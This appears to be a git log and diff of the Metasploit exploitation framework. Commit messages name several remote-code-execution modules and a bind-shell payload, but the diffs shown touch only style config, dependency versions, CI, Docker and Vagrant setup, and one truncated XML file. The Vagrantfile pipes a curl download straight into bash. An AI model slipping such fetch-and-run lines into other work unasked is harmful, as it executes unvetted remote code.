Benjamin 9d0b434f35 Initial commit Cisco RV320 and RV325 remote code execution 2019-02-25 15:51:05 +01:00
blightzero 2afe592c96 Cisco RV32x RCE added reference IDs, some beautifications. 2019-02-25 15:46:25 +01:00
blightzero eb9a063c68 Cisco RV32x RCE added reference IDs, some beautifications. 2019-02-25 15:45:08 +01:00
Pedro Ribeiro dfb0c8edf2 Merge pull request #7 from rapid7/master
bbbb
2019-02-24 22:27:43 +07:00
asoto-r7 efba6d2d9c Reverse engineered JSOs 2019-02-20 16:45:47 -06:00
asoto-r7 0f9a796d2f Reverse engineered JSOs, used new ysoserial functionality 2019-02-20 14:28:09 -06:00
asoto-r7 5f84cbc078 Reverse engineered JSOs, used new ysoserial functionality 2019-02-20 14:12:24 -06:00
Pedro Ribeiro 26f2b61612 Merge pull request #5 from rapid7/master
aaa
2019-02-20 23:38:44 +07:00
Max Michels 6fac0ecdcb documentation for fortinet ssl vpn module added 2019-02-19 22:42:04 +00:00
Max Michels 40b3fbaf05 removed unused lines of code 2019-02-19 22:33:10 +00:00
Max Michels a90777303f Debugging ci error 2019-02-17 19:05:51 +00:00
Max Michels 49975b7549 cookie not necessary 2019-02-17 18:08:30 +00:00
Max Michels e434b6a40a make the file for tidy 2019-02-17 17:25:04 +00:00
Max Michels 8d6114498d added domain/realm support 2019-02-17 16:56:16 +00:00
Max Michels 708ae76cba change method to follow style guide 2019-02-17 16:08:58 +00:00
Max 09b0d0fa66 adding fortinet ssl vpn bruteforce 2019-02-14 09:35:02 +01:00
rwincey a0b5291c30 Space slipped in 2019-02-13 10:25:21 -05:00
rwincey e716c24f2d Style police :P 2019-02-13 00:35:54 -05:00
rwincey b55fdc7323 Minor updates 2019-02-11 21:39:43 -05:00
Ziconius b49b7ca9db Remove unneeded require 2019-02-11 11:24:04 -05:00
Ziconius 08e1f86390 Add Webmin 1900 Remote Code Exec Module
Adding Webmin RCE module affecting Webmin <= 1.900. Module attempts to
use the Running Processes (proc) permission to determine upload dir,
if the permission is not set the module fails. The user can attempt the
exploit without this permission by setting the 'GUESSUPLOAD' opt to
true.

The default path is in an array of 1 to allow for other OS/Version
default paths to be added in future.
2019-02-11 10:45:03 -05:00
rwincey f1675cddad Documentation 2019-02-10 23:16:45 -05:00
rwincey ced3ad0bfd BMC Patrol CMD Exec Module 2019-02-10 22:26:24 -05:00
bcoles 1e3be0fd3f Update modules/payloads/singles/linux/x86/shell_bind_tcp_super_small_random_port.rb
Co-Authored-By: Ekzorcist <infosecurity@ya.ru>
2019-02-10 22:32:00 +03:00
bcoles 346a73d52a Update modules/payloads/singles/linux/x86/shell_bind_tcp_super_small_random_port.rb
Co-Authored-By: Ekzorcist <infosecurity@ya.ru>
2019-02-10 22:31:23 +03:00
Ekzorcist 0b768d32be Add metasm format of code for Super small Shell Bind TCP Random Port Payload 2019-02-09 15:28:56 +03:00
Ekzorcist c1b37f7463 Merge branch 'master' of github.com:rapid7/metasploit-framework into new 2019-02-09 15:24:06 +03:00
Ekzorcist d327dc79f0 Add Super Small Shell Bind TCP Random Port Payload (x86) 2019-02-08 15:46:31 +03:00
Benjamin 0cbb5b4220 Initial commit Cisco RV320 and RV325 remote code execution 2019-01-31 17:06:48 +01:00
Pedro Ribeiro 291320ea8c Merge pull request #4 from rapid7/master
merge
2019-01-30 22:05:11 +07:00
rwincey 2bbcc815c4 Merge pull request #1 from rwincey/upstream-master
Upstream master
2019-01-27 11:06:00 -08:00
Andres Rodriguez a10a5e74c4 Use of send_request_cgi instead of raw socket(incomplete responses) and other small fixes 2018-12-17 15:10:36 -08:00
Andres Rodriguez 8072b038ed Use of send_request_cgi instead of raw socket(incomplete responses) and other small fixes 2018-12-17 15:09:08 -08:00
Andres Rodriguez 3fb723cc1b Use of send_request_cgi instead of raw socket(incomplete requests) and other small fixes 2018-12-17 15:04:55 -08:00
Andres Rodriguez b9cccc2e8f Improvements on code quality and documentation 2018-12-17 00:15:48 -08:00
Andres Rodriguez 4660f83768 Fix a typo in the documentation 2018-12-16 23:51:20 -08:00
Andres Rodriguez f05ea634a3 Improvements on code quality and documentation 2018-12-16 23:42:59 -08:00
Andres Rodriguez 48df4be54e Improvements on code quality and documentation 2018-12-16 12:47:52 -08:00
Andres Rodriguez 1ecc5461bf Metasploit module for CVE 2017-3248, Weblogic serialization RCE RMI UnicastRef 2018-12-16 06:21:09 -08:00
Andres Rodriguez 8ce7643e41 Some improvements in code and documentation. 2018-12-15 21:07:53 -08:00
Andres Rodriguez 873d048b89 Some improvements in code and documentation. 2018-12-15 20:42:17 -08:00
Brendan Coles 3d3cf83d4c Update documentation/modules/exploit/multi/misc/weblogic_deserialize_rawobject.md
Co-Authored-By: acamro <acamro@users.noreply.github.com>
2018-12-15 23:23:39 -05:00
Brendan Coles 4c14642b99 Update modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb
Co-Authored-By: acamro <acamro@users.noreply.github.com>
2018-12-15 23:23:23 -05:00
Brendan Coles 8dfd8aa4cd Update modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb
Co-Authored-By: acamro <acamro@users.noreply.github.com>
2018-12-15 23:23:14 -05:00
Andres Rodriguez 29c70b8585 Some fixes of sintax errors 2018-12-15 19:44:05 -08:00
Andres Rodriguez 826c93ff8a Sintax error in an elseif 2018-12-15 19:41:35 -08:00
Andres Rodriguez 25a447fa35 Removed line at the end of file (to pass all tests) 2018-12-15 19:21:37 -08:00
Andres Rodriguez d8f19ff6c8 Removed line at the end of file (to pass all tests) 2018-12-15 19:19:47 -08:00
Andres Rodriguez a936d3f78f Metasploit module for CVE 2016-3510, Weblogic serialization RCE Marshalled Object 2018-12-15 19:12:33 -08:00
Andres Rodriguez 82db6025c9 Some fixes to pass msftidy. 2018-12-15 18:32:17 -08:00
Andres Rodriguez 446144ba8e Metasploit module for CVE 2015-4852, Weblogic serialization RCE Raw Object 2018-12-15 18:26:34 -08:00
asoto-r7 117d8ad986 Change default behavior of required OptString to permit empty strings 2018-11-29 11:34:44 -06:00
Tim W 17ffd83374 only upload screenshot dll on windows 2018-09-04 00:36:30 +08:00
636 changed files with 163534 additions and 6280 deletions
+50 -8
View File
@@ -45,6 +45,10 @@ Style/RedundantReturn:
Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
Enabled: false
Naming/VariableNumber:
Description: 'To make it easier to use reference code, disable this cop'
Enabled: false
Style/NumericPredicate:
Description: 'This adds no efficiency nor space saving'
Enabled: false
@@ -55,14 +59,18 @@ Style/Documentation:
Exclude:
- 'modules/**/*'
Layout/IndentHeredoc:
Layout/SpaceInsideArrayLiteralBrackets:
Enabled: false
Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
Description: 'Almost all module metadata have space in brackets'
Style/GuardClause:
Enabled: false
Description: 'This often introduces bugs in tested code'
Style/EmptyLiteral:
Enabled: false
Description: 'This looks awkward when you mix empty and non-empty literals'
Style/NegatedIf:
Enabled: false
Description: 'This often introduces bugs in tested code'
@@ -72,9 +80,16 @@ Style/ConditionalAssignment:
Description: 'This is confusing for folks coming from other languages'
Style/Encoding:
Enabled: true
Description: 'We prefer binary to UTF-8.'
EnforcedStyle: 'when_needed'
Enabled: false
Style/ParenthesesAroundCondition:
Enabled: false
Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
Style/TrailingCommaInArrayLiteral:
Enabled: false
Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'
Metrics/LineLength:
Description: >-
@@ -83,6 +98,13 @@ Metrics/LineLength:
Enabled: true
Max: 180
Metrics/BlockLength:
Enabled: true
Description: >-
While the style guide suggests 10 lines, exploit definitions
often exceed 200 lines.
Max: 300
Metrics/MethodLength:
Enabled: true
Description: >-
@@ -90,10 +112,10 @@ Metrics/MethodLength:
often exceed 200 lines.
Max: 300
# Basically everything in metasploit needs binary encoding, not UTF-8.
# Disable this here and enforce it through msftidy
Style/Encoding:
Enabled: false
Naming/UncommunicativeMethodParamName:
Enabled: true
Description: 'Whoever made this requirement never looked at crypto methods, IV'
MinNameLength: 2
# %q() is super useful for long strings split over multiple lines and
# is very common in module constructors for things like descriptions
@@ -104,11 +126,31 @@ Style/NumericLiterals:
Enabled: false
Description: 'This often hurts readability for exploit-ish code.'
Layout/AlignHash:
Enabled: false
Description: 'aligning info hashes to match these rules is almost impossible to get right'
Layout/EmptyLines:
Enabled: false
Description: 'these are used to increase readability'
Layout/EmptyLinesAroundClassBody:
Enabled: false
Description: 'these are used to increase readability'
Layout/EmptyLinesAroundMethodBody:
Enabled: false
Description: 'these are used to increase readability'
Layout/AlignParameters:
Enabled: true
EnforcedStyle: 'with_fixed_indentation'
Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
Style/For:
Enabled: false
Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
Style/StringLiterals:
Enabled: false
Description: 'Single vs double quote fights are largely unproductive.'
+1 -1
View File
@@ -1 +1 @@
2.6.1
2.6.2
+2 -9
View File
@@ -11,10 +11,8 @@ addons:
- graphviz
language: ruby
rvm:
- '2.3.8'
- '2.4.5'
- '2.5.3'
- '2.6.1'
- '2.5.5'
- '2.6.2'
env:
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -25,11 +23,6 @@ env:
matrix:
fast_finish: true
exclude:
- rvm: '2.3.8'
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
- rvm: '2.4.5'
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
jobs:
# build docker image
+7 -4
View File
@@ -20,12 +20,15 @@ it into Metasploit's master branch. If you do not care to follow these rules, y
* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
* **Do** follow the [50/72 rule] for Git commit messages.
* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
history of your pull request. See [PR#8000] for an example of losing commit history as soon as
you update your own master branch.
* **Do** create a [topic branch] to work on instead of working directly on `master`.
This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
allows for a location for more commits to be offered without mingling with other contributor changes,
and allows contributors to make progress while a PR is still being reviewed.
### Pull Requests
* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
* **Do** target your pull request to the **master branch**.
* **Do** specify a descriptive title to make searching for your pull request easier.
* **Do** include [console output], especially for witnessable effects in `msfconsole`.
@@ -84,7 +87,7 @@ curve, so keep it up!
[Rubocop]:https://rubygems.org/search?query=rubocop
[50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
+2 -3
View File
@@ -1,4 +1,4 @@
FROM ruby:2.6.1-alpine3.9 AS builder
FROM ruby:2.6.2-alpine3.9 AS builder
LABEL maintainer="Rapid7"
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -29,7 +29,6 @@ RUN apk add --no-cache \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& gem update --system \
&& gem install bundler \
&& bundle install --clean --no-cache --system $BUNDLER_ARGS \
# temp fix for https://github.com/bundler/bundler/issues/6680
&& rm -rf /usr/local/bundle/cache \
@@ -37,7 +36,7 @@ RUN apk add --no-cache \
&& chmod -R a+r /usr/local/bundle
FROM ruby:2.6.1-alpine3.9
FROM ruby:2.6.2-alpine3.9
LABEL maintainer="Rapid7"
ENV APP_HOME=/usr/src/metasploit-framework
+80 -54
View File
@@ -1,10 +1,13 @@
PATH
remote: .
specs:
metasploit-framework (5.0.10)
metasploit-framework (5.0.36)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
aws-sdk-ec2
aws-sdk-iam
aws-sdk-s3
backports
bcrypt
bcrypt_pbkdf
@@ -21,9 +24,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.62)
metasploit_data_models
metasploit_payloads-mettle (= 0.5.7)
metasploit-payloads (= 1.3.70)
metasploit_data_models (= 3.0.10)
metasploit_payloads-mettle (= 0.5.16)
mqtt
msgpack
nessus_rest
@@ -56,7 +59,7 @@ PATH
rex-random_identifier
rex-registry
rex-rop_builder
rex-socket
rex-socket (= 0.1.17)
rex-sslscan
rex-struct2
rex-text
@@ -80,40 +83,62 @@ GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.0.3)
actionpack (4.2.11)
actionview (= 4.2.11)
activesupport (= 4.2.11)
actionpack (4.2.11.1)
actionview (= 4.2.11.1)
activesupport (= 4.2.11.1)
rack (~> 1.6)
rack-test (~> 0.6.2)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (4.2.11)
activesupport (= 4.2.11)
actionview (4.2.11.1)
activesupport (= 4.2.11.1)
builder (~> 3.1)
erubis (~> 2.7.0)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (4.2.11)
activesupport (= 4.2.11)
activemodel (4.2.11.1)
activesupport (= 4.2.11.1)
builder (~> 3.1)
activerecord (4.2.11)
activemodel (= 4.2.11)
activesupport (= 4.2.11)
activerecord (4.2.11.1)
activemodel (= 4.2.11.1)
activesupport (= 4.2.11.1)
arel (~> 6.0)
activesupport (4.2.11)
activesupport (4.2.11.1)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.2)
addressable (2.6.0)
public_suffix (>= 2.0.2, < 4.0)
afm (0.2.2)
arel (6.0.4)
arel-helpers (2.8.0)
activerecord (>= 3.1.0, < 6)
backports (3.12.0)
bcrypt (3.1.12)
bcrypt_pbkdf (1.0.0)
arel-helpers (2.9.1)
activerecord (>= 3.1.0, < 7)
aws-eventstream (1.0.3)
aws-partitions (1.184.0)
aws-sdk-core (3.59.0)
aws-eventstream (~> 1.0, >= 1.0.2)
aws-partitions (~> 1.0)
aws-sigv4 (~> 1.1)
jmespath (~> 1.0)
aws-sdk-ec2 (1.99.0)
aws-sdk-core (~> 3, >= 3.58.0)
aws-sigv4 (~> 1.1)
aws-sdk-iam (1.27.0)
aws-sdk-core (~> 3, >= 3.58.0)
aws-sigv4 (~> 1.1)
aws-sdk-kms (1.23.0)
aws-sdk-core (~> 3, >= 3.58.0)
aws-sigv4 (~> 1.1)
aws-sdk-s3 (1.45.0)
aws-sdk-core (~> 3, >= 3.58.0)
aws-sdk-kms (~> 1)
aws-sigv4 (~> 1.1)
aws-sigv4 (1.1.0)
aws-eventstream (~> 1.0, >= 1.0.2)
backports (3.15.0)
bcrypt (3.1.13)
bcrypt_pbkdf (1.0.1)
bindata (2.4.4)
bit-struct (0.16)
builder (3.2.3)
@@ -125,7 +150,7 @@ GEM
diff-lcs (1.3)
dnsruby (1.61.2)
addressable (~> 2.5)
docile (1.3.1)
docile (1.3.2)
ed25519 (1.2.4)
em-http-request (1.1.5)
addressable (>= 2.3.4)
@@ -139,10 +164,10 @@ GEM
eventmachine (1.2.7)
factory_bot (5.0.2)
activesupport (>= 4.2.0)
factory_bot_rails (5.0.1)
factory_bot (~> 5.0.0)
factory_bot_rails (5.0.2)
factory_bot (~> 5.0.2)
railties (>= 4.2.0)
faker (1.9.3)
faker (1.9.5)
i18n (>= 0.7)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
@@ -152,13 +177,14 @@ GEM
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jmespath (1.4.0)
jsobfu (0.4.2)
rkelly-remix
json (2.2.0)
loofah (2.2.3)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
metasm (1.0.3)
metasm (1.0.4)
metasploit-concern (2.0.5)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
@@ -177,8 +203,8 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.62)
metasploit_data_models (3.0.5)
metasploit-payloads (1.3.70)
metasploit_data_models (3.0.10)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
arel-helpers
@@ -188,20 +214,20 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.5.7)
metasploit_payloads-mettle (0.5.16)
method_source (0.9.2)
mini_portile2 (2.4.0)
minitest (5.11.3)
mqtt (0.5.0)
msgpack (1.2.6)
multipart-post (2.0.0)
msgpack (1.3.0)
multipart-post (2.1.1)
nessus_rest (0.1.6)
net-ssh (5.1.0)
net-ssh (5.2.0)
network_interface (0.0.2)
nexpose (7.2.1)
nokogiri (1.10.1)
nokogiri (1.10.3)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
octokit (4.14.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.2)
openvas-omp (0.0.4)
@@ -224,7 +250,7 @@ GEM
pry (0.12.2)
coderay (~> 1.1.0)
method_source (~> 0.9.0)
public_suffix (3.0.3)
public_suffix (3.1.1)
rack (1.6.11)
rack-protection (1.5.5)
rack
@@ -238,14 +264,14 @@ GEM
rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.4)
loofah (~> 2.2, >= 2.2.2)
railties (4.2.11)
actionpack (= 4.2.11)
activesupport (= 4.2.11)
railties (4.2.11.1)
actionpack (= 4.2.11.1)
activesupport (= 4.2.11.1)
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (12.3.2)
rb-readline (0.5.5)
recog (2.2.0)
recog (2.3.2)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.13)
@@ -261,7 +287,7 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.20)
rex-exploitation (0.1.21)
jsobfu
metasm
rex-arch
@@ -274,7 +300,7 @@ GEM
rex-arch
rex-ole (0.1.6)
rex-text
rex-powershell (0.1.79)
rex-powershell (0.1.82)
rex-random_identifier
rex-text
rex-random_identifier (0.1.4)
@@ -299,12 +325,12 @@ GEM
rspec-core (~> 3.8.0)
rspec-expectations (~> 3.8.0)
rspec-mocks (~> 3.8.0)
rspec-core (3.8.0)
rspec-core (3.8.2)
rspec-support (~> 3.8.0)
rspec-expectations (3.8.2)
rspec-expectations (3.8.4)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.8.0)
rspec-mocks (3.8.0)
rspec-mocks (3.8.1)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.8.0)
rspec-rails (3.8.2)
@@ -317,19 +343,19 @@ GEM
rspec-support (~> 3.8.0)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.8.0)
rspec-support (3.8.2)
ruby-macho (2.2.0)
ruby-rc4 (0.1.5)
ruby_smb (1.0.5)
ruby_smb (1.1.0)
bindata
rubyntlm
windows_error
rubyntlm (0.6.2)
rubyzip (1.2.2)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
simplecov (0.16.1)
rubyzip (1.2.3)
sawyer (0.8.2)
addressable (>= 2.3.5)
faraday (> 0.8, < 2.0)
simplecov (0.17.0)
docile (~> 1.1)
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
@@ -352,7 +378,7 @@ GEM
ttfunk (1.5.1)
tzinfo (1.2.5)
thread_safe (~> 0.1)
tzinfo-data (1.2018.9)
tzinfo-data (1.2019.2)
tzinfo (>= 1.0.0)
warden (1.2.7)
rack (>= 1.0)
@@ -361,7 +387,7 @@ GEM
activemodel (>= 4.2.7)
activesupport (>= 4.2.7)
xmlrpc (0.3.0)
yard (0.9.18)
yard (0.9.20)
PLATFORMS
ruby
+47 -38
View File
@@ -1,17 +1,25 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 1.0.3, MIT
actionpack, 4.2.11, MIT
actionview, 4.2.11, MIT
activemodel, 4.2.11, MIT
activerecord, 4.2.11, MIT
activesupport, 4.2.11, MIT
addressable, 2.5.2, "Apache 2.0"
actionpack, 4.2.11.1, MIT
actionview, 4.2.11.1, MIT
activemodel, 4.2.11.1, MIT
activerecord, 4.2.11.1, MIT
activesupport, 4.2.11.1, MIT
addressable, 2.6.0, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT
arel-helpers, 2.8.0, MIT
backports, 3.12.0, MIT
bcrypt, 3.1.12, MIT
bcrypt_pbkdf, 1.0.0, MIT
arel-helpers, 2.9.1, MIT
aws-eventstream, 1.0.3, "Apache 2.0"
aws-partitions, 1.184.0, "Apache 2.0"
aws-sdk-core, 3.59.0, "Apache 2.0"
aws-sdk-ec2, 1.99.0, "Apache 2.0"
aws-sdk-iam, 1.27.0, "Apache 2.0"
aws-sdk-kms, 1.23.0, "Apache 2.0"
aws-sdk-s3, 1.45.0, "Apache 2.0"
aws-sigv4, 1.1.0, "Apache 2.0"
backports, 3.15.0, MIT
bcrypt, 3.1.13, MIT
bcrypt_pbkdf, 1.0.1, MIT
bindata, 2.4.4, ruby
bit-struct, 0.16, ruby
builder, 3.2.3, MIT
@@ -23,44 +31,45 @@ crass, 1.0.4, MIT
daemons, 1.3.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.61.2, "Apache 2.0"
docile, 1.3.1, MIT
docile, 1.3.2, MIT
ed25519, 1.2.4, MIT
em-http-request, 1.1.5, MIT
em-socksify, 0.3.2, MIT
erubis, 2.7.0, MIT
eventmachine, 1.2.7, "ruby, GPL-2.0"
factory_bot, 5.0.2, MIT
factory_bot_rails, 5.0.1, MIT
faker, 1.9.3, MIT
factory_bot_rails, 5.0.2, MIT
faker, 1.9.5, MIT
faraday, 0.15.4, MIT
filesize, 0.2.0, MIT
fivemat, 1.3.7, MIT
hashery, 2.1.2, "Simplified BSD"
http_parser.rb, 0.6.0, MIT
i18n, 0.9.5, MIT
jmespath, 1.4.0, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.2.0, ruby
loofah, 2.2.3, MIT
metasm, 1.0.3, LGPL
metasm, 1.0.4, LGPL-2.1
metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 3.0.3, "New BSD"
metasploit-framework, 5.0.10, "New BSD"
metasploit-framework, 5.0.36, "New BSD"
metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.3.62, "3-clause (or ""modified"") BSD"
metasploit_data_models, 3.0.5, "New BSD"
metasploit_payloads-mettle, 0.5.7, "3-clause (or ""modified"") BSD"
metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
metasploit_data_models, 3.0.10, "New BSD"
metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
method_source, 0.9.2, MIT
mini_portile2, 2.4.0, MIT
minitest, 5.11.3, MIT
mqtt, 0.5.0, MIT
msgpack, 1.2.6, "Apache 2.0"
multipart-post, 2.0.0, MIT
msgpack, 1.3.0, "Apache 2.0"
multipart-post, 2.1.1, MIT
nessus_rest, 0.1.6, MIT
net-ssh, 5.1.0, MIT
net-ssh, 5.2.0, MIT
network_interface, 0.0.2, MIT
nexpose, 7.2.1, "New BSD"
nokogiri, 1.10.1, MIT
octokit, 4.13.0, MIT
nokogiri, 1.10.3, MIT
octokit, 4.14.0, MIT
openssl-ccm, 1.2.2, MIT
openvas-omp, 0.0.4, MIT
packetfu, 1.1.13, BSD
@@ -71,28 +80,28 @@ pg, 0.21.0, "New BSD"
pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.1, MIT
pry, 0.12.2, MIT
public_suffix, 3.0.3, MIT
public_suffix, 3.1.1, MIT
rack, 1.6.11, MIT
rack-protection, 1.5.5, MIT
rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.9, MIT
rails-html-sanitizer, 1.0.4, MIT
railties, 4.2.11, MIT
railties, 4.2.11.1, MIT
rake, 12.3.2, MIT
rb-readline, 0.5.5, BSD
recog, 2.2.0, unknown
recog, 2.3.2, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.13, "New BSD"
rex-bin_tools, 0.1.6, "New BSD"
rex-core, 0.1.13, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.20, "New BSD"
rex-exploitation, 0.1.21, "New BSD"
rex-java, 0.1.5, "New BSD"
rex-mime, 0.1.5, "New BSD"
rex-nop, 0.1.1, "New BSD"
rex-ole, 0.1.6, "New BSD"
rex-powershell, 0.1.79, "New BSD"
rex-powershell, 0.1.82, "New BSD"
rex-random_identifier, 0.1.4, "New BSD"
rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD"
@@ -103,19 +112,19 @@ rex-text, 0.2.21, "New BSD"
rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.8.0, MIT
rspec-core, 3.8.0, MIT
rspec-expectations, 3.8.2, MIT
rspec-mocks, 3.8.0, MIT
rspec-core, 3.8.2, MIT
rspec-expectations, 3.8.4, MIT
rspec-mocks, 3.8.1, MIT
rspec-rails, 3.8.2, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.8.0, MIT
rspec-support, 3.8.2, MIT
ruby-macho, 2.2.0, MIT
ruby-rc4, 0.1.5, MIT
ruby_smb, 1.0.5, "New BSD"
ruby_smb, 1.1.0, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.2, "Simplified BSD"
sawyer, 0.8.1, MIT
simplecov, 0.16.1, MIT
rubyzip, 1.2.3, "Simplified BSD"
sawyer, 0.8.2, MIT
simplecov, 0.17.0, MIT
simplecov-html, 0.10.2, MIT
sinatra, 1.4.8, MIT
sqlite3, 1.3.13, "New BSD"
@@ -128,9 +137,9 @@ tilt, 2.0.9, MIT
timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.5, MIT
tzinfo-data, 1.2018.9, MIT
tzinfo-data, 1.2019.2, MIT
warden, 1.2.7, MIT
windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby
yard, 0.9.18, MIT
yard, 0.9.20, MIT
Vendored
-1
View File
@@ -31,7 +31,6 @@ Vagrant.configure(2) do |config|
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
"curl -L https://get.rvm.io | bash -s stable",
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
"source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
"source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
"mkdir -p ~/.msf4",
].each do |step|
+18 -3
View File
@@ -22,11 +22,26 @@ unless ENV['BUNDLE_GEMFILE']
end
end
# Remove bigdecimal warning - start
# https://github.com/ruby/bigdecimal/pull/115
# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
# TODO: remove when upgrading from rails 4.x
require 'bigdecimal'
def BigDecimal.new(*args, **kwargs)
return BigDecimal(*args) if kwargs.empty?
BigDecimal(*args, **kwargs)
end
# Remove bigdecimal warning - end
begin
require 'bundler/setup'
rescue LoadError
$stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
$stderr.puts " $ gem install bundler"
rescue LoadError => e
$stderr.puts "[*] Bundler failed to load and returned this error:"
$stderr.puts
$stderr.puts " '#{e}'"
$stderr.puts
$stderr.puts "[*] You may need to uninstall or upgrade bundler"
exit(1)
end
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="UTF-8"?>
<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" 